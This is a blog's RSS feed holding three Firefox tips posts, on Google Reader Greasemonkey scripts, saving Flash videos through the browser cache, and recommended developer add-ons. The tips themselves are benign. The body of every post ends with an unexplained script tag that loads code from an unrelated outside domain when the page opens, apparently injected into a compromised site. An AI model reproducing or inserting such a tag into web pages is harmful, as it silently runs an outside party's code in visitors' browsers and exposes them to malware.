<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>robbaier.com&#187; Firefox</title>
	<atom:link href="http://www.robbaier.com/category/firefox/feed" rel="self" type="application/rss+xml" />
	<link>http://www.robbaier.com</link>
	<description></description>
	<lastBuildDate>Mon, 01 Dec 2008 21:56:29 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Improve Your Google Reader Experience</title>
		<link>http://www.robbaier.com/firefox/improve-your-google-reader-experience</link>
		<comments>http://www.robbaier.com/firefox/improve-your-google-reader-experience#comments</comments>
		<pubDate>Mon, 01 Dec 2008 21:55:10 +0000</pubDate>
		<dc:creator>Rob</dc:creator>
				<category><![CDATA[Firefox]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[google reader]]></category>
		<category><![CDATA[greasemonkey]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[rss]]></category>

		<guid isPermaLink="false">http://www.robbaier.com/?p=287</guid>
		<description><![CDATA[If you use Google Reader as your RSS reader of choice, you may have wished that you could have more control over how it displays things.  Luckily, with the use of Firefox and a couple Greasemonkey scripts, you have a few options for tweaking its behavior.

First, I recommend you install Better GReader.  This [...]]]></description>
			<content:encoded><![CDATA[<p>If you use <a href="http://www.google.com/reader/">Google Reader</a> as your RSS reader of choice, you may have wished that you could have more control over how it displays things.  Luckily, with the use of Firefox and a couple Greasemonkey scripts, you have a few options for tweaking its behavior.</p>
<p><span id="more-287"></span></p>
<p>First, I recommend you install <a href="http://lifehacker.com/software/exclusive-lifehacker-download/trick-out-google-reader-with-better-greader-262020.php">Better GReader</a>.  This Firefox add-on allows you to use different &#8220;skins,&#8221; which can improve the use of screen real estate.  It also has some additional niceties such as displaying feed favicons and allowing you to preview the item within Google Reader before actually visiting the site it came from.</p>
<p>Second, if you have Greasemonkey installed, I highly recommend the <a href="http://userscripts.org/scripts/show/23671">Google Reader Filter</a> user script.  It can highlight or exclude feed items based on keywords you provide.  It can also filter out duplicate items, which can be a huge time-saver.</p>
<p>I have made some changes to the Google Reader Filter because it didn&#8217;t work exactly like I wanted.  It wouldn&#8217;t highlight or exclude items that had already been read, which I found annoying, and it would only search the title of the feed item for keywords, not the whole feed item.  So, with my changes, it now highlights and excludes regardless of whether the item has been read or where in the feed item the keyword appears.  If you are interested in my code, leave a comment and I&#8217;ll post it on the site.</p>
<p><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.robbaier.com/firefox/improve-your-google-reader-experience/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Download Flash Videos Using Firefox Cache</title>
		<link>http://www.robbaier.com/firefox/download-flash-videos-using-firefox-cache</link>
		<comments>http://www.robbaier.com/firefox/download-flash-videos-using-firefox-cache#comments</comments>
		<pubDate>Thu, 20 Nov 2008 19:05:06 +0000</pubDate>
		<dc:creator>Rob</dc:creator>
				<category><![CDATA[Firefox]]></category>

		<guid isPermaLink="false">http://www.robbaier.com/?p=281</guid>
		<description><![CDATA[Have you ever watched a Flash video on a website and wanted to save it to your computer?  Chances are, if you were persistent, you found the SWF Flash file in the source and tried downloading that, but typically that isn&#8217;t the file you&#8217;re looking for.  Usually websites use a SWF player that [...]]]></description>
			<content:encoded><![CDATA[<p>Have you ever watched a Flash video on a website and wanted to save it to your computer?  Chances are, if you were persistent, you found the SWF Flash file in the source and tried downloading that, but typically that isn&#8217;t the file you&#8217;re looking for.  Usually websites use a SWF player that loads external Flash files that have an FLV file extension.  To easily find these files and save them to your computer, you can use Firefox&#8217;s disk cache interface.</p>
<p><span id="more-281"></span></p>
<p>After loading the page that contains the video you&#8217;re interested in, open a new tab and type this into the address bar: <code>about:cache?device=disk</code>.  That will bring up Firefox&#8217;s interface for the disk cache.  You can see that it is a fairly long page and it shows you all the images, scripts and other files that are downloaded while browsing the web.  It could take you a very long time to scroll through the entire page looking for the file you&#8217;re interested in, so you&#8217;ll naturally want to do a search.  Hit CTRL-F (for find) to bring up the search box and type in &#8220;flv&#8221; without the quotes.  This will take you directly to the first result.  It may take you a few times to find the file you want, but you should be able to find it eventually.</p>
<p><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.robbaier.com/firefox/download-flash-videos-using-firefox-cache/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Essential Firefox Add-Ons</title>
		<link>http://www.robbaier.com/firefox/firefox-addons</link>
		<comments>http://www.robbaier.com/firefox/firefox-addons#comments</comments>
		<pubDate>Thu, 09 Oct 2008 15:40:08 +0000</pubDate>
		<dc:creator>Rob</dc:creator>
				<category><![CDATA[Firefox]]></category>

		<guid isPermaLink="false">http://www.robbaier.com/?p=234</guid>
		<description><![CDATA[A list of Firefox Add-Ons that I find essential to my daily web work.]]></description>
			<content:encoded><![CDATA[<p>In the past, I&#8217;ve been asked what Firefox add-ons I use to make web development and web design easier.  So I thought I&#8217;d pull this list together and offer my suggestions on what works for me.  I am constantly trying out new add-ons, but these are the ones that I have kept ever since installing them.  Some of these add-ons are absolute must-haves, while others just provide some nice features that make browsing more convenient.  If you think I&#8217;ve missed any that you find essential to web design and development, please leave a comment.</p>
<p><span id="more-234"></span></p>
<div class="firefox-addon">
<h2 class="firebug"><a href="https://addons.mozilla.org/en-US/firefox/addon/1843">Firebug</a></h2>
<p>Firebug is the Firefox add-on that I use the most.  Honestly, I don&#8217;t know how I used to get by without it.  It is a very powerful tool that allows you to make changes to CSS and HTML and instantly see the changes.  It allows you to visually select an element on a page and it will instantly tell you what styles are being applied to that element.  You can use it to see how long a page takes to load and why.  Firebug is also very useful for JavaScript debugging and DOM manipulation.  Basically, if you&#8217;re serious about web design or development, you should be using Firebug.</p>
</div>
<div class="firefox-addon">
<h2 class="web-developer"><a href="https://addons.mozilla.org/en-US/firefox/addon/60">Web Developer</a></h2>
<p>The Web Developer add-on gives you the ability to selectively enable and disable stylesheets, scripts, images, cookies, etc.  It can display a lot of useful information such as image dimensions, image file sizes, line guides (similar to guides in Photoshop), and much more.  It will also allow you to easily resize the browser window to any size you choose, which is valuable when testing for different screen resolutions.  I consider this another must-have add-on for anyone doing serious web design or web development work.</p>
</div>
<div class="firefox-addon">
<h2 class="html-validator"><a href="https://addons.mozilla.org/en-US/firefox/addon/249">HTML Validator</a></h2>
<p>In this day and age, any self-respecting web designer or web developer should be developing websites using valid code that follows the W3C standards.  This Firefox add-on gives me instant feedback on whether or not my pages adhere to these standards.  It puts an icon in the bottom-right corner of the tray to let you know if a page contains errors or warnings, or if the code is valid.  This saves a lot of time since I don&#8217;t have to manually check pages through the W3C web-based validator.</p>
<p>I have also used <a href="https://addons.mozilla.org/en-US/firefox/addon/2318">Total Validator</a> to do code validation.  It works okay, but is a little more complicated than I need.</p>
</div>
<div class="firefox-addon">
<h2 class="screengrab"><a href="https://addons.mozilla.org/en-US/firefox/addon/1146">Screengrab</a></h2>
<p>It&#8217;s often useful when designing a webpage to be able to grab the screen contents and save them to a file or paste them into Photoshop.  Screengrab makes this very easy.  Especially helpful is the option to save the entire webpage to a file rather than just the visible portion.  In the past, this could only be accomplished by taking multiple screenshots and stitching them together in Photoshop.  Screengrab does it with one click.  Another nice feature is the ability to grab just a portion of the screen with a draggable selection box.</p>
</div>
<div class="firefox-addon">
<h2 class="colorzilla"><a href="https://addons.mozilla.org/en-US/firefox/addon/271">Colorzilla</a></h2>
<p>Sometimes when I&#8217;m browsing the web, I see a color I really like and want to use in one of my designs.  Colorzilla allows you to use an eye dropper (similar to Photoshop) to grab any color on screen and view its RGB and hex values.  It also has a nice feature to pull all colors associated with DOM objects and show them to you together.  You can then save the colors as a palette file.</p>
</div>
<div class="firefox-addon">
<h2 class="fireftp"><a href="https://addons.mozilla.org/en-US/firefox/addon/684">FireFTP</a></h2>
<p>I have used several FTP clients over the years including CuteFTP, WS FTP, Bullet Proof FTP and FileZilla.  While they all do what they&#8217;re supposed to, they all feel overly complicated and bloated.  I haven&#8217;t had any of these FTP clients installed on my computers since I discovered FireFTP.  It just fits in with my workflow so well, and is one less piece of software I have to worry about.  Now I just have a tab open in Firefox for transferring files.  It doesn&#8217;t have a ton of features, but it has a connection manager and allows me to easily transfer files, which is all I really need.  It does have a feature to keep directories in sync between the server and your local machine, which is nice.</p>
</div>
<div class="firefox-addon">
<h2 class="ietab"><a href="https://addons.mozilla.org/en-US/firefox/addon/1419">IE Tab</a></h2>
<p>Occasionally there are certain webpages or web apps that only work well in IE (SharePoint, for example).  Rather that abandon my Firefox workflow and fire up IE itself, I use this add-on.  IETab allows you to define certain sites that you would like to open with IE.  Then, when you are viewing one of these sites, it changes the Firefox rendering engine to embed IE in a Firefox tab.</p>
</div>
<div class="firefox-addon">
<h2 class="foxmarks"><a href="https://addons.mozilla.org/en-US/firefox/addon/2410">Foxmarks</a></h2>
<p>Between work and home, I use Firefox on four computers.  The problem with this is that I ended up with four different sets of bookmarks, which is annoying.  This is where Foxmarks comes in.  By signing up for a Foxmarks account, you can store your bookmarks in a central location.  Then, with the Foxmarks add-on installed on each computer, your bookmarks are kept in sync.  While you could certainly get by without this add-on, I can&#8217;t imagine wanting to do so after having used it.</p>
</div>
<div class="firefox-addon">
<h2 class="map-this"><a href="https://addons.mozilla.org/en-US/firefox/addon/1886">Map This</a></h2>
<p>This add-on isn&#8217;t really related to web development, but I find it very useful.  If there is an address on a web page that you would like to see on a Google map, all you have to do is select it, right click and choose Map This.  You can also set up a default starting address, select the address you want directions to, right click and choose Map to This.</p>
</div>
<div class="firefox-addon">
<h2 class="twitter-bar"><a href="https://addons.mozilla.org/en-US/firefox/addon/4664">Twitter Bar</a></h2>
<p>Twitter Bar allows you to post Tweets to your Twitter account right from the Firefox address bar, saving you from going to Twitter, logging in, and then posting your Tweets that way.</p>
</div>
<p><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.robbaier.com/firefox/firefox-addons/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
